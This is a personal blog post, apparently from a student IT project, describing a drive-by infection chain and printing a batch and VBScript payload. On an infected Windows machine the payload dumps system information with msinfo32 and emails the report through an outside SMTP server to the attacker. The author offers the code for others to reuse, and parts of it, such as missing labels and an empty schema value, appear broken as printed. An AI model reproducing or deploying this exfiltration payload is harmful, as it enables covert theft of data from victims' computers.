Send email with information about infected computer

Send email with information about infected computer

1 Comment on Send email with information about infected computer

So, now that I have everything up and running, its time for the fun to begin. Since I only know a bit java and python I decided to try some bash since it seemed to fit better in the project. 

Started by brainstorming , trying to figure out what I wanted my script to do.  This is where the planning comes into account and lets you make decisions quickly. My use-case diagram clearly states that my program should send a email with information about infected computer. After this it was easy to decide that this was the goto plan since it was already included in my system design. My design will send email with information about infected computer in 4 steps :

  1. Computer is browsing to my website
  2. The exploit is being run and the computer gets infected
  3. The payload is delivered and the code will run.
  4. A email is sent to a email account with a file attached that provide information about the infected computer

But how?!

I remembered that in 1st semester we tried to send emails using telnet. So this was my choice in the beginning. After searching around on Google, it seem that everybody was giving the same advice. Batch is not good at working together with telnet.

This was kinda a killer for me, since I know of no other way to automated the process of sending emails. Luckily I found a script written half in batch and half in visual basic. I didn’t know visual basic, but could read the code well enough to edit it to do exactly what I wanted it to do. I’ve included the code here if other people want to take advantage of it some day. 

@echo off

:: defaults
set From=
set To=
set Subj="Computer added %date% %time%"
set Body="New computer added %date% %time%"
set Auth=####
set Pass=#########
set fileattach=C:sysinfo.txt

start /WAIT msinfo32 /report C:sysinfo.txt
call :createVBS "email-bat.vbs"

call :send %From% %To% %Subj% %Body% %Serv% %Auth% %Pass%
del "%vbsfile%" 2>nul
goto :EOF

cscript.exe /nologo "%vbsfile%" %1 %2 %3 %4 %5 %6 %7 >nul 2>nul
goto :EOF

set "vbsfile=%~1"
del "%vbsfile%" 2>nul
set cdoSchema=
echo >>"%vbsfile%" Set objArgs = WScript.Arguments
echo >>"%vbsfile%" Set objEmail = CreateObject("CDO.Message")
echo >>"%vbsfile%" objEmail.From = objArgs(0)
echo >>"%vbsfile%" objEmail.To = objArgs(1)
echo >>"%vbsfile%" objEmail.Subject = objArgs(2)
echo >>"%vbsfile%" objEmail.Textbody = objArgs(3)
if defined fileattach echo >>"%vbsfile%" objEmail.AddAttachment "%fileattach%"
echo >>"%vbsfile%" with objEmail.Configuration.Fields
echo >>"%vbsfile%" .Item ("%cdoSchema%/sendusing") = 2 ' not local, smtp
echo >>"%vbsfile%" .Item ("%cdoSchema%/smtpserver") = objArgs(4)
echo >>"%vbsfile%" .Item ("%cdoSchema%/smtpserverport") = 465
echo >>"%vbsfile%" .Item ("%cdoSchema%/smtpauthenticate") = 1 ' cdobasic
echo >>"%vbsfile%" .Item ("%cdoSchema%/sendusername") = objArgs(5)
echo >>"%vbsfile%" .Item ("%cdoSchema%/sendpassword") = objArgs(6)
echo >>"%vbsfile%" .Item ("%cdoSchema%/smtpusessl") = True
echo >>"%vbsfile%" .Item ("%cdoSchema%/smtpconnectiontimeout") = 25
echo >>"%vbsfile%" .Update
echo >>"%vbsfile%" end with
echo >>"%vbsfile%" objEmail.Send


This code generates a txt file called systeminfo.txt and places it in C:systeminfo.txt and than waits 

The way it works is that the script calls a program in windows xp called “msinfo32” this small program ships with window xp and is normally used by Microsoft to generate information about the system used for testing or support purposes. After this file is generated the script checks if there is a file in place called “systeminfo.txt” and if there is it will continue with the email part.

I login with my email information and tells it to use the google smtp to send my email to myself with the txt attached.

Martin Jørgensen

Martin Jørgensen

Got my degree from EAL in 2012 as an IT-Technologist with specialty in network. I enjoy living in a century where I can earn a living doing my hobby. Material I publish here are often part of my small projects.
Martin Jørgensen

Latest posts by Martin Jørgensen (see all)

Related Posts

Back to Top